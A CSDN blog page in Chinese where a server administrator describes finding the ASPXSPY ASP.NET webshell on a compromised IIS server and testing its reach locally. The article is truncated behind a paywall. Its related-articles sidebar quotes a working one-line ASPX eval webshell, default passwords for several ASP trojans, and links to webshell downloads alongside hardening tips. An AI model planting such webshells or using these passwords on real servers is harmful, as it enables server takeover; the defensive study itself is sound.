关于ASP.NET木马ASPXSPY的初步处理研究

最新推荐文章于 2021-08-06 16:28:46 发布
最新推荐文章于 2021-08-06 16:28:46 发布
阅读量8.4k 收藏 2
点赞数 4
分类专栏: ASP.NET Web开发 文章标签: asp.net 服务器 iis 数据库 远程连接 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ETZRP/article/details/6737132
版权
前段时间服务器中了木马了,经过排查,截获了ASPXSPY木马。该木马是用ASP.NET写的,为了知己知彼,就将木马拷到本地运行研究,发现功能真的很强大,自认为服务器设置有一定经验的我在默认情况下对此木马都大门敞开。我的基本设置:每个Web设置有专门用户,而每个用户都只是Gue
摘要由CSDN通过智能技术生成
前段时间服务器中了木马了,经过排查,截获了ASPXSPY木马。该木马是用ASP.NET写的,为了知己知彼,就将木马拷到本地运行研究,发现功能真的很强大,自认为服务器设置有一定经验的我在默认情况下对此木马都大门敞开。
我的基本设置:每个Web设置有专门用户,而每个用户都只是Guest组帐号,仅对Web目录具有访问权。应用程序池全部都是Network service帐号运行。结果发现给木马所有功能都能正常运行。如下图所示。

aspxspy运行图

文件(夹)管理,默认木马所在网站目录,如果你的其他站点设置了users权限,那么恭喜你中奖了。它几乎能够自由操作你的整个服务器硬盘。
最低0.47元/天 解锁文章
etzrp
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 42
    评论
专栏目录
aspxspy mysql_网站管理软件 - AspxSpy2014 Final
weixin_35473090的博客
02-06 201
受bin牛委托修改并发布,版权归bin牛所有。Bug/建议提交:zcgonvh@rootkit.net.cn祝各位马年大吉,财源滚滚。免责声明:本程序只用于管理员安全检测,使用前请注意环境与法律法规,因使用不当造成的后果本人不承担任何责任。已测试的系统:win2003+iis6+.net2.0win2008+iis7+.net4.0win8+iis8+.net4.5注意:此版本最低需要.ne...
aspxspy.aspx“木马”文件又名专版aspx汗血宝马
橙-极纪元-cplvfx-JJY.Cheng
01-29 2717
我想通过这个图片你已经看到了这个木马的强大之处了,服务器上的所有资源一览无余,各种操作,各种骚……你懂得! aspxspy.aspx文件下载地址【仅供学习,不得用于破坏,后果自负】:http://download.csdn.net/download/cplvfx/10229067 关于ASP.NET木马ASPXSPY初步处理研究 作者:etzrp 文章连接:http://
aspxspy mysql_ASP.NET ASPXSpy安全设置的防御方法(终极和一般防御)
weixin_42467518的博客
02-06 183
终极防御(CmdShell、IIS Spy、Process、Services、UserInfo、SysInfo、RegShell)可能影响个别网站正常运行,请测试网站无问题再正式使用这方法。网站ASP.NET version切换成2.0.50727C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\web.config 修改成 修改成...
webshell三剑客[aspxspy、phpspy、jspspy]
weixin_34248705的博客
03-15 794
ASPSPY:http://www.rootkit.net.cn/article.asp?id=132<已关闭> 下载:ASPXspy2 JSPSPY:http://www.forjj.com/?action=show&id=138 <已关闭> 下载:jspspy PHPSPY:http://www.4ngel.net/project/phpspy.ht...
防止aspxspy木马列服务 iis信息 执行命令提权等操作
01-10
1.禁止aspxspy木马执行命令提权 和读取注册表 测试方法一: 先打开:C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\config\web.config 之后找到 ”Full” originUrl=””> 改为 ”High” originUrl=””> 然后...
ASPXspy 2.0.rar
04-12
ASPXSpy 2.0 是一个专门针对ASP.NET应用程序的调试和分析工具,它为开发者提供了深入理解ASP.NET页面生命周期和内部工作原理的能力。这款工具的主要功能在于帮助开发者捕获和分析HTTP请求、响应以及ASP.NET页面的...
aspxspy.aspx又名专版aspx汗血宝马
01-29
【标题】"aspxspy.aspx",又被称为"专版aspx汗血宝马",是一种在ASP.NET开发中被广泛讨论的安全漏洞利用工具。这个工具主要用于探测和分析ASP.NET应用程序的内部工作机制,特别是针对安全漏洞进行侦查。由于其功能...
ASPXspy2.aspx
08-23
ASPXspy2.aspx 文件是针对ASP.NET环境的一个安全测试工具,主要用于评估服务器ASP.NET配置是否安全。在ASP.NET框架中,网页文件通常以.aspx为扩展名,它们包含了Web应用程序的用户界面和业务逻辑。ASPXspy2.aspx的...
绝迹珍藏版aspxspy1.0,最初的才是最美好的!
09-13
webshell,无多余代码,无修改版,传说中江湖上已经绝迹的版本。最初的 ,也是最美好的,就像。
各大Asp木马的万能密码
fengling132的专栏
03-19 5308
各大Asp木马的万能密码 首先十三webshell9.0VIP版和漫步云端修改版,默认密码?x=x或?web=admin  还有易思免杀ASP大马,密码?PageName=PageName  黑羽黑客基地小马默认密码donqee或kaifeng  朽木奥运版最新ASP木马(黑色版本),朽木奥运版最新ASP木马(绿色版本)  黑客动画吧奥运版最新ASP木马(黑色版本),黑客动画
ASP.NET(aspxspy)防提权设置
weixin_33860737的博客
02-25 154
防止读取注册表、运行命令、查看服务、查看进程: 打开:C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\config\web.config找到<trust level=”Full” originUrl=”" /> 改为 <trust level=”High” originUrl=”" />然后打开C:\WINDOWS\Micros...
asp.net 编译生成报病毒
web开发自学
04-21 170
如图:asp.net在点击网站生成时候360报病毒,阻止了VS加载,导致生成失败。(关闭杀软可以正常生成) 我自己开发的网站,整个项目有2个网站,一个报病毒一个不报病毒能够生成成功,没有经过什么特殊操作,没什么特殊代码,做着做着就报病毒。 将网站传到其他机器上面生成能够通过,这说明网站本身是不含有病毒的,那么就是我机器感染了病毒,对机器进行杀毒也没有发现什么异常情况,但是如果说感染了病毒为...
一句话木马ASPX篇
热门推荐
weixin_42478365的博客
08-06 1万+
一句话木马ASPX篇 aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Fo
aspx到webshell肉鸡
05-15 6400
笔者一直都在强调一个东西,在网络攻防中最重要的就是思维。本文的灵感来自于安天365团队的一个篇稿件,在稿件中提到了一个AspxSpyAsp.net类型后门软件,在安全界中最近一直流行后门中的后门,即通过给出一个包含后门的Webshell程序,众多小黑们在外面吭哧吭哧的干活,而给出后门的老板,却在后面偷着数Webshell,这种后门中的后门一般来说有二种类型,一种就是直接挂马,带来直接的收益;另外
Aspx 一句话木马和客户端(备用)
eldn__的专栏
04-18 1635
以下是引用片段: 这个一句话不用说了!我之前已经发表文章讲解过! client端HTML页面代码如下 以下是引用片段: I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320 body,td{font-size: 12px;} table{T:expression(this.border='1',this.borderColorLigh
经典的 Aspx一句话木马使用
tuo9999的专栏
07-12 1677
1. 相当于 ASP 一句话木马 : 顺序代码 alter databas pub set RECOVERY FULL-- creat tabl pubs.dbo.cmd a imag backup log pub to disk = 'c:/TM' with init fals ;ow.Writ Request.Params["l"] ;ow.Clos %> ' insert into pubs.dbo.cmd a valu '<%System.IO.StreamWrit
ASPXSpy2014.aspx
最新发布
01-29
根据提供的引用内容,ASPXSpy2014.aspx是一个ASP.NET文件,用于测试主机的ASP.NET安全设置。它需要在搭建IIS服务器时勾选相关选项,并且需要.NET环境才能复现。该文件可能包含一些用于测试和评估ASP.NET安全性的功能。 由于安全性问题,我无法提供关于ASPXSpy2014.aspx的详细介绍或演示。如果您对ASP.NET安全性有任何疑问或需要进一步了解ASPXSpy2014.aspx,请提供更具体的问题,我将尽力为您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 42
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值